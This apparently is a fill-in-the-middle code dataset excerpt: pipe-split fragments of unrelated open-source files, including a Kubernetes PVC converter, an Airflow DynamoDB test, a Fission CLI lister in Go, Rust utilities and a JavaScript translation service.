switch t := obj.(type) {
case *corev1.PersistentVolumeClaim:
pvc = t
case *api.PersistentVolumeClaim:
if err := k8s_api_v1.Convert_core_PersistentVolumeClaim_To_v1_PersistentVolumeClaim(t, pvc, nil); err != nil {
return nil, err
}
default:
return nil, fmt.Errorf("expect *api.PersistentVolumeClaim or *v1.PersistentVolumeClaim, got %v", t)
}
return pvc, nil
} | if op == admission.Create {
return true
}
if op == admission.Update && utilfeature.DefaultFeatureGate.Enabled(k8sfeatures.ExpandPersistentVolumes) { |
issue-23304-2.rs | // Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
#![allow(dead_code)]
enum X { A = 0 as isize }
enum Y { A = X::A as isize }
fn | () { }
| main |
station.py | import logging
from numpy import degrees, pi, radians
from beyond.frames import get_frame, create_station
from beyond.errors import UnknownFrameError
from .wspace import ws
from .utils import dms2deg, deg2dms
log = logging.getLogger(__name__)
class StationDb:
def __new__(cls):
if not hasattr(cls, "_instance"):
# Singleton
cls._instance = super().__new__(cls)
return cls._instance
@classmethod
def list(cls):
self = cls()
if not hasattr(self, "_stations"):
self._stations = {}
for abbr, charact in ws.config["stations"].items():
charact["parent_frame"] = get_frame(charact["parent_frame"])
full_name = charact.pop("name")
mask = charact.get("mask")
if mask:
# reverse direction of the mask to put it in counterclockwise
# to comply with the mathematical definition
charact["mask"] = (
(2 * pi - radians(mask["azims"][::-1])),
radians(mask["elevs"][::-1]),
)
# Deletion of all unknown characteristics from the charact dict
# and conversion to object attributes (they may be used by addons)
extra_charact = {}
for key in list(charact.keys()):
if key not in ("parent_frame", "latlonalt", "mask"):
extra_charact[key] = charact.pop(key)
self._stations[abbr] = create_station(abbr, **charact)
self._stations[abbr].abbr = abbr
self._stations[abbr].full_name = full_name
for key, value in extra_charact.items():
setattr(self._stations[abbr], key, value)
return self._stations
@classmethod
def get(cls, name):
self = cls()
try:
return get_frame(name)
except UnknownFrameError:
if name not in self.list().keys():
raise
return self.list()[name]
@classmethod
def save(cls, station):
self = cls()
ws.config["stations"].update(station)
ws.config.save()
if hasattr(self, "_stations"):
del self._stations
def wshook(cmd, *args, **kwargs):
if cmd in ("init", "full-init"):
name = "TLS"
ws.config.setdefault("stations", {})
try:
StationDb.get(name)
except UnknownFrameError:
StationDb.save(
{
name: {
"latlonalt": [43.604482, 1.443962, 172.0],
"name": "Toulouse",
"parent_frame": "WGS84",
}
}
)
log.info("Station {} created".format(name))
else:
log.warning("Station {} already exists".format(name))
def space_station(*argv):
| """Stations management
Usage:
space-station list [--map] [<abbr>]
space-station create <abbr> <name> <lat> <lon> <alt>
Options
list List available stations
create Interactively create a station
<abbr> Abbreviation
<name> Name of the station
<lat> Latitude in degrees
<lon> Longitude in degrees
<alt> Altitude in meters
-m, --map Display the station on a map
Latitude and longitude both accept degrees as float or as
degrees, minutes and seconds of arc (e.g. 43°25"12')
"""
from pathlib import Path
import matplotlib.pyplot as plt
from .utils import docopt
from .map.background import set_background
args = docopt(space_station.__doc__)
station = StationDb()
if args["create"]:
abbr = args["<abbr>"]
name = args["<name>"]
latitude = args["<lat>"]
longitude = args["<lon>"]
altitude = args["<alt>"]
if "°" in latitude:
latitude = dms2deg(latitude)
else:
latitude = float(latitude)
if "°" in longitude:
longitude = dms2deg(longitude)
else:
longitude = float(longitude)
altitude = float(altitude)
log.info("Creation of station '{}' ({})".format(name, abbr))
log.debug(
"{} {}, altitude : {} m".format(
deg2dms(latitude, "lat"), deg2dms(longitude, "lon"), altitude
)
)
StationDb.save(
{
abbr: {
"name": name,
"latlonalt": (latitude, longitude, altitude),
"parent_frame": "WGS84",
}
}
)
else:
stations = []
for station in sorted(station.list().values(), key=lambda x: x.abbr):
if args["<abbr>"] and station.abbr != args["<abbr>"]:
continue
print(station.name)
print("-" * len(station.name))
lat, lon, alt = station.latlonalt
lat, lon = degrees([lat, lon])
print("name: {}".format(station.full_name))
print(
"altitude: {} m\nposition: {}, {}".format(
alt, deg2dms(lat, "lat"), deg2dms(lon, "lon")
)
)
print()
stations.append((station.name, lat, lon))
if args["--map"]:
plt.figure(figsize=(15.2, 8.2))
set_background()
plt.subplots_adjust(left=0.02, right=0.98, top=0.98, bottom=0.02)
plt.show()
|
|
frozen_pb.py | # -*- coding: utf-8 -*-
# Copyright (c) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tensorflow frozen pb model."""
from ..model_type_getter import get_model_type
from .model import TensorflowModel as TFModel
class FrozenPbModel(TFModel):
"""Frozen pb model."""
@staticmethod
def supports_path(path: str) -> bool:
| """Check if given path is of supported model."""
return "frozen_pb" == get_model_type(path) |
|
test_aws_dynamodb_hook.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import unittest
import uuid
from airflow.providers.amazon.aws.hooks.aws_dynamodb_hook import AwsDynamoDBHook
try:
from moto import mock_dynamodb2
except ImportError:
mock_dynamodb2 = None
| @unittest.skipIf(mock_dynamodb2 is None, 'mock_dynamodb2 package not present')
@mock_dynamodb2
def test_get_conn_returns_a_boto3_connection(self):
hook = AwsDynamoDBHook(aws_conn_id='aws_default')
self.assertIsNotNone(hook.get_conn())
@unittest.skipIf(mock_dynamodb2 is None, 'mock_dynamodb2 package not present')
@mock_dynamodb2
def test_insert_batch_items_dynamodb_table(self):
hook = AwsDynamoDBHook(aws_conn_id='aws_default',
table_name='test_airflow', table_keys=['id'], region_name='us-east-1')
# this table needs to be created in production
table = hook.get_conn().create_table(
TableName='test_airflow',
KeySchema=[
{
'AttributeName': 'id',
'KeyType': 'HASH'
},
],
AttributeDefinitions=[
{
'AttributeName': 'id',
'AttributeType': 'S'
}
],
ProvisionedThroughput={
'ReadCapacityUnits': 10,
'WriteCapacityUnits': 10
}
)
table = hook.get_conn().Table('test_airflow')
items = [{'id': str(uuid.uuid4()), 'name': 'airflow'}
for _ in range(10)]
hook.write_batch_data(items)
table.meta.client.get_waiter(
'table_exists').wait(TableName='test_airflow')
self.assertEqual(table.item_count, 10)
if __name__ == '__main__':
unittest.main() | class TestDynamoDBHook(unittest.TestCase):
|
analyzer.rs | use crate::{cfg::CFG, ssa::builder::SSABuilder};
use sifc_bytecode::instr::Instr;
pub struct Analyzer {
program: Vec<Instr>,
}
impl Analyzer {
pub fn new(v: Vec<Instr>) -> Analyzer {
Analyzer { program: v }
}
pub fn build_cfg(&self) -> CFG {
CFG::build(&self.program)
}
pub fn build_ssa(&self) -> CFG |
pub fn perform(&self) {
self.build_ssa();
}
}
| {
let cfg = CFG::build(&self.program);
let mut ssab = SSABuilder::new(&cfg);
ssab.build();
cfg
} |
list.go | /*
Copyright 2019 The Fission Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package spec
import (
"fmt"
"os"
"strings"
"text/tabwriter"
"time"
"github.com/pkg/errors"
fv1 "github.com/fission/fission/pkg/apis/core/v1"
"github.com/fission/fission/pkg/controller/client"
"github.com/fission/fission/pkg/fission-cli/cliwrapper/cli"
"github.com/fission/fission/pkg/fission-cli/cmd"
flagkey "github.com/fission/fission/pkg/fission-cli/flag/key"
"github.com/fission/fission/pkg/fission-cli/util"
)
// ListSubCommand struct
type ListSubCommand struct {
cmd.CommandActioner
}
// List lists resources in the spec.
func List(input cli.Input) error {
return (&ListSubCommand{}).do(input)
}
func (opts *ListSubCommand) do(input cli.Input) error {
return opts.run(input)
}
func (opts *ListSubCommand) run(input cli.Input) error {
deployID := input.String(flagkey.SpecDeployID)
if len(deployID) == 0 {
// get specdir, specignore and read the deployID
specDir := util.GetSpecDir(input)
specIgnore := util.GetSpecIgnore(input)
fr, err := ReadSpecs(specDir, specIgnore)
if err != nil {
return errors.Wrap(err, "error reading specs")
}
deployID = fr.DeploymentConfig.UID
}
allfn, err := getAllFunctions(opts.Client())
if err != nil {
return errors.Wrap(err, "error getting Functions from all namespaces")
}
specfns := getAppliedFunctions(allfn, deployID)
ShowFunctions(specfns)
allenvs, err := getAllEnvironments(opts.Client())
if err != nil {
return errors.Wrap(err, "error getting Environments from all namespaces")
}
specenvs := getAppliedEnvironments(allenvs, deployID)
ShowEnvironments(specenvs)
pkglists, err := getAllPackages(opts.Client())
if err != nil {
return errors.Wrap(err, "error getting Packages from all namespaces")
}
specPkgs := getAppliedPackages(pkglists, deployID)
ShowPackages(specPkgs)
canaryCfgs, err := getAllCanaryConfigs(opts.Client())
if err != nil {
return errors.Wrap(err, "error getting Canary Config from all namespaces")
}
specCanaryCfgs := getAppliedCanaryConfigs(canaryCfgs, deployID)
ShowCanaryConfigs(specCanaryCfgs)
hts, err := getAllHTTPTriggers(opts.Client())
if err != nil {
return errors.Wrap(err, "error getting HTTP Triggers from all namespaces")
}
specHTTPTriggers := getAppliedHTTPTriggers(hts, deployID)
ShowHTTPTriggers(specHTTPTriggers)
mqts, err := getAllMessageQueueTriggers(opts.Client(), input.String(flagkey.MqtMQType))
if err != nil {
return errors.Wrap(err, "error getting MessageQueue Triggers from all namespaces")
}
specMessageQueueTriggers := getAppliedMessageQueueTriggers(mqts, deployID)
ShowMQTriggers(specMessageQueueTriggers)
tts, err := getAllTimeTriggers(opts.Client())
if err != nil {
return errors.Wrap(err, "error getting Time Triggers from all namespaces")
}
specTimeTriggers := getAppliedTimeTriggers(tts, deployID)
ShowTimeTriggers(specTimeTriggers)
kws, err := getAllKubeWatchTriggers(opts.Client())
if err != nil {
return errors.Wrap(err, "error getting Kube Watchers from all namespaces")
}
specKubeWatchers := getSpecKubeWatchers(kws, deployID)
ShowAppliedKubeWatchers(specKubeWatchers)
return nil
}
func getAppliedFunctions(fns []fv1.Function, deployID string) []fv1.Function {
var fnlist []fv1.Function
if len(fns) > 0 {
for _, f := range fns {
if f.ObjectMeta.Annotations["fission-uid"] == deployID {
fnlist = append(fnlist, f)
}
}
}
return fnlist
}
func getAppliedEnvironments(envs []fv1.Environment, deployID string) []fv1.Environment {
var envlist []fv1.Environment
if len(envs) > 0 {
for _, f := range envs {
if f.ObjectMeta.Annotations["fission-uid"] == deployID {
envlist = append(envlist, f)
}
}
}
return envlist
}
func getAppliedPackages(pkgs []fv1.Package, deployID string) []fv1.Package {
var pkglist []fv1.Package
if len(pkgs) > 0 {
for _, f := range pkgs {
if f.ObjectMeta.Annotations["fission-uid"] == deployID {
pkglist = append(pkglist, f)
}
}
}
return pkglist
}
func getAppliedCanaryConfigs(canaryCfgs []fv1.CanaryConfig, deployID string) []fv1.CanaryConfig {
var canaryConfiglist []fv1.CanaryConfig
if len(canaryCfgs) > 0 {
for _, f := range canaryCfgs {
if f.ObjectMeta.Annotations["fission-uid"] == deployID {
canaryConfiglist = append(canaryConfiglist, f)
}
}
}
return canaryConfiglist
}
func getAppliedHTTPTriggers(hts []fv1.HTTPTrigger, deployID string) []fv1.HTTPTrigger {
var httpTriggerlist []fv1.HTTPTrigger
if len(hts) > 0 {
for _, f := range hts {
if f.ObjectMeta.Annotations["fission-uid"] == deployID {
httpTriggerlist = append(httpTriggerlist, f)
}
}
}
return httpTriggerlist
}
func getAppliedMessageQueueTriggers(mqts []fv1.MessageQueueTrigger, deployID string) []fv1.MessageQueueTrigger {
var mqTriggerlist []fv1.MessageQueueTrigger
if len(mqts) > 0 {
for _, f := range mqts {
if f.ObjectMeta.Annotations["fission-uid"] == deployID {
mqTriggerlist = append(mqTriggerlist, f)
}
}
}
return mqTriggerlist
}
func getAppliedTimeTriggers(tts []fv1.TimeTrigger, deployID string) []fv1.TimeTrigger {
var timeTriggerlist []fv1.TimeTrigger
if len(tts) > 0 {
for _, f := range tts {
if f.ObjectMeta.Annotations["fission-uid"] == deployID {
timeTriggerlist = append(timeTriggerlist, f)
}
}
}
return timeTriggerlist
}
func getSpecKubeWatchers(ws []fv1.KubernetesWatchTrigger, deployID string) []fv1.KubernetesWatchTrigger {
var kubeWatchTriggerlist []fv1.KubernetesWatchTrigger
if len(ws) > 0 {
for _, f := range ws {
if f.ObjectMeta.Annotations["fission-uid"] == deployID {
kubeWatchTriggerlist = append(kubeWatchTriggerlist, f)
}
}
}
return kubeWatchTriggerlist
}
// ShowFunctions displays info of Functions
func ShowFunctions(fns []fv1.Function) {
if len(fns) > 0 {
w := tabwriter.NewWriter(os.Stdout, 0, 0, 1, ' ', 0)
fmt.Fprintf(w, "%v\n", "Functions:")
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n", "NAME", "ENV", "EXECUTORTYPE", "MINSCALE", "MAXSCALE", "MINCPU", "MAXCPU", "MINMEMORY", "MAXMEMORY", "TARGETCPU", "SECRETS", "CONFIGMAPS")
for _, f := range fns {
secrets := f.Spec.Secrets
configMaps := f.Spec.ConfigMaps
var secretsList, configMapList []string
for _, secret := range secrets {
secretsList = append(secretsList, secret.Name)
}
for _, configMap := range configMaps {
configMapList = append(configMapList, configMap.Name)
}
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n",
f.ObjectMeta.Name, f.Spec.Environment.Name,
f.Spec.InvokeStrategy.ExecutionStrategy.ExecutorType,
f.Spec.InvokeStrategy.ExecutionStrategy.MinScale,
f.Spec.InvokeStrategy.ExecutionStrategy.MaxScale,
f.Spec.Resources.Requests.Cpu().String(), | f.Spec.InvokeStrategy.ExecutionStrategy.TargetCPUPercent,
strings.Join(secretsList, ","),
strings.Join(configMapList, ","))
}
fmt.Fprintf(w, "\n")
w.Flush()
}
}
// ShowEnvironments displays info of Environments
func ShowEnvironments(envs []fv1.Environment) {
if len(envs) > 0 {
w := tabwriter.NewWriter(os.Stdout, 0, 0, 1, ' ', 0)
fmt.Fprintf(w, "%v\n", "Environments:")
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n", "NAME", "IMAGE", "BUILDER_IMAGE", "POOLSIZE", "MINCPU", "MAXCPU", "MINMEMORY", "MAXMEMORY", "EXTNET", "GRACETIME")
for _, env := range envs {
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n",
env.ObjectMeta.Name, env.Spec.Runtime.Image, env.Spec.Builder.Image, env.Spec.Poolsize,
env.Spec.Resources.Requests.Cpu(), env.Spec.Resources.Limits.Cpu(),
env.Spec.Resources.Requests.Memory(), env.Spec.Resources.Limits.Memory(),
env.Spec.AllowAccessToExternalNetwork, env.Spec.TerminationGracePeriod)
}
fmt.Fprintf(w, "\n")
w.Flush()
}
}
// ShowPackages displays info of Packages
func ShowPackages(pkgList []fv1.Package) {
if len(pkgList) > 0 {
w := tabwriter.NewWriter(os.Stdout, 0, 0, 1, ' ', 0)
fmt.Fprintf(w, "%v\n", "Packages:")
fmt.Fprintf(w, "%v\t%v\t%v\t%v\n", "NAME", "BUILD_STATUS", "ENV", "LASTUPDATEDAT")
for _, pkg := range pkgList {
fmt.Fprintf(w, "%v\t%v\t%v\t%v\n", pkg.ObjectMeta.Name, pkg.Status.BuildStatus, pkg.Spec.Environment.Name, pkg.Status.LastUpdateTimestamp.Format(time.RFC822))
}
fmt.Fprintf(w, "\n")
w.Flush()
}
}
// ShowCanaryConfigs displays info of Canary Configs
func ShowCanaryConfigs(canaryCfgs []fv1.CanaryConfig) {
if len(canaryCfgs) > 0 {
w := tabwriter.NewWriter(os.Stdout, 0, 0, 1, ' ', 0)
fmt.Fprintf(w, "%v\n", "Canary Config:")
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n", "NAME", "TRIGGER", "FUNCTION-N", "FUNCTION-N-1", "WEIGHT-INCREMENT", "INTERVAL", "FAILURE-THRESHOLD", "FAILURE-TYPE", "STATUS")
for _, canaryCfg := range canaryCfgs {
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n",
canaryCfg.ObjectMeta.Name, canaryCfg.Spec.Trigger, canaryCfg.Spec.NewFunction, canaryCfg.Spec.OldFunction, canaryCfg.Spec.WeightIncrement, canaryCfg.Spec.WeightIncrementDuration,
canaryCfg.Spec.FailureThreshold, canaryCfg.Spec.FailureType, canaryCfg.Status.Status)
}
fmt.Fprintf(w, "\n")
w.Flush()
}
}
// ShowHTTPTriggers displays info of HTTP Triggers
func ShowHTTPTriggers(hts []fv1.HTTPTrigger) {
if len(hts) > 0 {
w := tabwriter.NewWriter(os.Stdout, 0, 0, 1, ' ', 0)
fmt.Fprintf(w, "%v\n", "HTTP Triggers:")
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n", "NAME", "METHOD", "URL", "FUNCTION(s)", "INGRESS", "HOST", "PATH", "TLS", "ANNOTATIONS")
for _, trigger := range hts {
function := ""
if trigger.Spec.FunctionReference.Type == fv1.FunctionReferenceTypeFunctionName {
function = trigger.Spec.FunctionReference.Name
} else {
for k, v := range trigger.Spec.FunctionReference.FunctionWeights {
function += fmt.Sprintf("%s:%v ", k, v)
}
}
host := trigger.Spec.Host
if len(trigger.Spec.IngressConfig.Host) > 0 {
host = trigger.Spec.IngressConfig.Host
}
path := trigger.Spec.RelativeURL
if trigger.Spec.Prefix != nil && *trigger.Spec.Prefix != "" {
path = *trigger.Spec.Prefix
}
if len(trigger.Spec.IngressConfig.Path) > 0 {
path = trigger.Spec.IngressConfig.Path
}
var msg []string
for k, v := range trigger.Spec.IngressConfig.Annotations {
msg = append(msg, fmt.Sprintf("%v: %v", k, v))
}
ann := strings.Join(msg, ", ")
methods := []string{}
if len(trigger.Spec.Method) > 0 {
methods = append(methods, trigger.Spec.Method)
}
if len(trigger.Spec.Methods) > 0 {
methods = trigger.Spec.Methods
}
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n",
trigger.ObjectMeta.Name, methods, trigger.Spec.RelativeURL, function, trigger.Spec.CreateIngress, host, path, trigger.Spec.IngressConfig.TLS, ann)
}
fmt.Fprintf(w, "\n")
w.Flush()
}
}
// ShowMQTriggers displays info of MessageQueue Triggers
func ShowMQTriggers(mqts []fv1.MessageQueueTrigger) {
if len(mqts) > 0 {
w := tabwriter.NewWriter(os.Stdout, 0, 0, 1, ' ', 0)
fmt.Printf("\nMessageQueue Triggers:\n")
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n", "NAME", "FUNCTION_NAME", "MESSAGE_QUEUE_TYPE", "TOPIC", "RESPONSE_TOPIC", "ERROR_TOPIC", "MAX_RETRIES", "PUB_MSG_CONTENT_TYPE")
for _, mqt := range mqts {
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n",
mqt.ObjectMeta.Name, mqt.Spec.FunctionReference.Name, mqt.Spec.MessageQueueType, mqt.Spec.Topic, mqt.Spec.ResponseTopic, mqt.Spec.ErrorTopic, mqt.Spec.MaxRetries, mqt.Spec.ContentType)
}
fmt.Fprintf(w, "\n")
w.Flush()
}
}
// ShowTimeTriggers displays info of Time Triggers
func ShowTimeTriggers(tts []fv1.TimeTrigger) {
if len(tts) > 0 {
w := tabwriter.NewWriter(os.Stdout, 0, 0, 1, ' ', 0)
fmt.Fprintf(w, "%v", "Time Triggers:\n")
fmt.Fprintf(w, "%v\t%v\t%v\n", "NAME", "CRON", "FUNCTION_NAME")
for _, tt := range tts {
fmt.Fprintf(w, "%v\t%v\t%v\n",
tt.ObjectMeta.Name, tt.Spec.Cron, tt.Spec.FunctionReference.Name)
}
fmt.Fprintf(w, "\n")
w.Flush()
}
}
// ShowAppliedKubeWatchers displays info of kube watchers
func ShowAppliedKubeWatchers(ws []fv1.KubernetesWatchTrigger) {
if len(ws) > 0 {
w := tabwriter.NewWriter(os.Stdout, 0, 0, 1, ' ', 0)
fmt.Fprintf(w, "%v", "Kube Watchers:\n")
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\n", "NAME", "NAMESPACE", "OBJTYPE", "LABELS", "FUNCTION_NAME")
for _, wa := range ws {
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\n",
wa.ObjectMeta.Name, wa.Spec.Namespace, wa.Spec.Type, wa.Spec.LabelSelector, wa.Spec.FunctionReference.Name)
}
fmt.Fprintf(w, "\n")
w.Flush()
}
}
// getAllFunctions get lists of functions in all namespaces
func getAllFunctions(client client.Interface) ([]fv1.Function, error) {
fns, err := client.V1().Function().List("")
if err != nil {
return nil, errors.Errorf("Unable to get Functions %v", err.Error())
}
return fns, nil
}
// getAllEnvironments get lists of environments in all namespaces
func getAllEnvironments(client client.Interface) ([]fv1.Environment, error) {
envs, err := client.V1().Environment().List("")
if err != nil {
return nil, errors.Errorf("Unable to get Environments %v", err.Error())
}
return envs, nil
}
// getAllPackages get lists of packages in all namespaces
func getAllPackages(client client.Interface) ([]fv1.Package, error) {
pkgList, err := client.V1().Package().List("")
if err != nil {
return nil, errors.Errorf("Unable to get Packages %v", err.Error())
}
return pkgList, nil
}
// getAllCanaryConfigs get lists of canary configs in all namespaces
func getAllCanaryConfigs(client client.Interface) ([]fv1.CanaryConfig, error) {
canaryCfgs, err := client.V1().CanaryConfig().List("")
if err != nil {
return nil, errors.Errorf("Unable to get Canary Configs %v", err.Error())
}
return canaryCfgs, nil
}
// getAllHTTPTriggers get lists of HTTP Triggers in all namespaces
func getAllHTTPTriggers(client client.Interface) ([]fv1.HTTPTrigger, error) {
hts, err := client.V1().HTTPTrigger().List("")
if err != nil {
return nil, errors.Errorf("Unable to get HTTP Triggers %v", err.Error())
}
return hts, nil
}
// getAllMessageQueueTriggers get lists of MessageQueue Triggers in all namespaces
func getAllMessageQueueTriggers(client client.Interface, mqttype string) ([]fv1.MessageQueueTrigger, error) {
mqts, err := client.V1().MessageQueueTrigger().List(mqttype, "")
if err != nil {
return nil, errors.Errorf("Unable to get MessageQueue Triggers %v", err.Error())
}
return mqts, nil
}
// getAllTimeTriggers get lists of Time Triggers in all namespaces
func getAllTimeTriggers(client client.Interface) ([]fv1.TimeTrigger, error) {
tts, err := client.V1().TimeTrigger().List("")
if err != nil {
return nil, errors.Errorf("Unable to get Time Triggers %v", err.Error())
}
return tts, nil
}
// getAllKubeWatchTriggers get lists of Kube Watchers in all namespaces
func getAllKubeWatchTriggers(client client.Interface) ([]fv1.KubernetesWatchTrigger, error) {
ws, err := client.V1().KubeWatcher().List("")
if err != nil {
return nil, errors.Errorf("Unable to get Kube Watchers %v", err.Error())
}
return ws, nil
} | f.Spec.Resources.Limits.Cpu().String(),
f.Spec.Resources.Requests.Memory().String(),
f.Spec.Resources.Limits.Memory().String(), |
lib.rs | //! string interner
//! same as cargo::core::interning.rs, but thread local and Deserializable
extern crate serde;
use serde::{de::Visitor, Deserialize, Deserializer, Serialize, Serializer};
use std::cell::RefCell;
use std::collections::HashSet;
use std::error::Error;
use std::fmt;
use std::ops::Deref;
use std::ptr;
use std::str;
fn leak(s: String) -> &'static str {
Box::leak(s.into_boxed_str())
}
thread_local! {
static STRING_CACHE: RefCell<HashSet<&'static str>> = Default::default();
}
#[derive(Clone, Copy, PartialOrd, Ord, Eq, Hash)]
pub struct InternedString {
inner: &'static str,
}
impl PartialEq for InternedString {
fn eq(&self, other: &InternedString) -> bool {
ptr::eq(self.as_str(), other.as_str())
}
}
impl InternedString {
pub fn new(st: &str) -> InternedString {
STRING_CACHE.with(|cache| {
let mut cache = cache.borrow_mut();
let s = cache.get(st).map(|&s| s).unwrap_or_else(|| {
let s = leak(st.to_string());
cache.insert(s);
s
});
InternedString { inner: s }
})
}
pub fn new_if_exists(st: &str) -> Option<InternedString> {
STRING_CACHE.with(|cache| cache.borrow().get(st).map(|&s| InternedString { inner: s }))
}
pub fn as_str(&self) -> &'static str {
self.inner
}
}
impl Deref for InternedString {
type Target = str;
fn deref(&self) -> &'static str {
self.as_str()
}
}
impl fmt::Debug for InternedString {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
fmt::Debug::fmt(self.as_str(), f)
}
}
impl fmt::Display for InternedString {
fn | (&self, f: &mut fmt::Formatter) -> fmt::Result {
fmt::Display::fmt(self.as_str(), f)
}
}
impl Serialize for InternedString {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: Serializer,
{
serializer.serialize_str(self.inner)
}
}
impl<'de> Deserialize<'de> for InternedString {
fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
where
D: Deserializer<'de>,
{
struct VisStr;
impl<'de> Visitor<'de> for VisStr {
type Value = InternedString;
fn expecting(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "expecting string")
}
fn visit_borrowed_str<E: Error>(self, v: &'de str) -> Result<InternedString, E> {
Ok(InternedString::new(v))
}
}
deserializer.deserialize_str(VisStr {})
}
}
| fmt |
size_of.rs | /*
* Copyright 2019 Comcast Cable Communications Management, LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* SPDX-License-Identifier: Apache-2.0
*/
use crate::net::MacAddr;
use std::mem;
use std::net::{Ipv4Addr, Ipv6Addr};
/// A trait for returning the size of a type in bytes.
///
/// Size of the structs are used for bound checks when reading and writing
/// packets.
///
///
/// # Derivable
///
/// The `SizeOf` trait can be used with `#[derive]` and defaults to
/// `std::mem::size_of::<Self>()`.
///
/// ```
/// #[derive(SizeOf)]
/// pub struct Ipv4Header {
/// ...
/// }
/// ```
pub trait SizeOf {
/// Returns the size of a type in bytes.
fn size_of() -> usize;
}
impl SizeOf for () {
fn size_of() -> usize {
mem::size_of::<()>()
}
}
impl SizeOf for u8 {
fn size_of() -> usize {
mem::size_of::<u8>()
}
}
impl SizeOf for [u8; 2] {
fn | () -> usize {
mem::size_of::<[u8; 2]>()
}
}
impl SizeOf for [u8; 16] {
fn size_of() -> usize {
mem::size_of::<[u8; 16]>()
}
}
impl SizeOf for MacAddr {
fn size_of() -> usize {
mem::size_of::<MacAddr>()
}
}
impl SizeOf for Ipv4Addr {
fn size_of() -> usize {
mem::size_of::<Ipv4Addr>()
}
}
impl SizeOf for Ipv6Addr {
fn size_of() -> usize {
mem::size_of::<Ipv6Addr>()
}
}
| size_of |
AppAuthorization.ts | /**
* Represents an app authorization structure.
*/ | export interface AppAuthorization {
key: string;
valid: boolean;
} | |
TranslationService.js | import { defaultValue, isNullOrUndefined } from "../helper/utils";
import { replaceAll, capitalize } from "../helper/strings";
import jQuery from "jquery";
const TranslationService = (function($)
{
let _translations = {};
// initialize translations
if (typeof translations !== "undefined")
{
_translations = translations;
}
else
{
_readTranslations();
}
return {
translate: _translate
};
function _readTranslations()
{
const identifierPattern = /^(\w+)::(\w+)$/;
const tags = document.querySelectorAll("script[data-translation]");
for (let i = 0; i < tags.length; i++)
{
if (!tags[i].dataset || !tags[i].dataset.translation)
{
continue;
}
const identifier = tags[i].dataset.translation;
if (!identifier || !identifierPattern.test(identifier))
{
console.error("Cannot read translations from script tag. Identifier is not valid");
}
const match = identifierPattern.exec(identifier);
const namespace = match[1];
const group = match[2];
if (!_translations.hasOwnProperty(namespace))
{
_translations[namespace] = {};
}
if (_translations[namespace].hasOwnProperty(group))
{
console.warn("Cannot override group \"" + namespace + "::" + group);
continue;
}
try
{
_translations[namespace][group] = JSON.parse(tags[i].innerHTML);
}
catch (err)
{
console.error("Error while parsing translations (" + identifier + ")");
}
}
}
function _translate(key, params)
{
const identifier = _parseKey(key);
if (identifier === null)
{
return key;
}
const namespace = _translations[identifier.namespace];
if (isNullOrUndefined(namespace))
{
return key;
}
const group = namespace[identifier.group];
if (isNullOrUndefined(group))
{ | }
const value = group[identifier.key];
if (!isNullOrUndefined(value))
{
return _replacePlaceholders(value, params);
}
return key;
}
function _replacePlaceholders(input, values)
{
values = values || {};
Object
.keys(values)
.sort((keyA, keyB) => keyB.length - keyA.length)
.forEach(
key =>
{
const value = "" + defaultValue(values[key], "");
input = replaceAll(
input,
":" + key,
value
);
input = replaceAll(
input,
":" + capitalize(key),
capitalize(value)
);
input = replaceAll(
input,
":" + key.toUpperCase(),
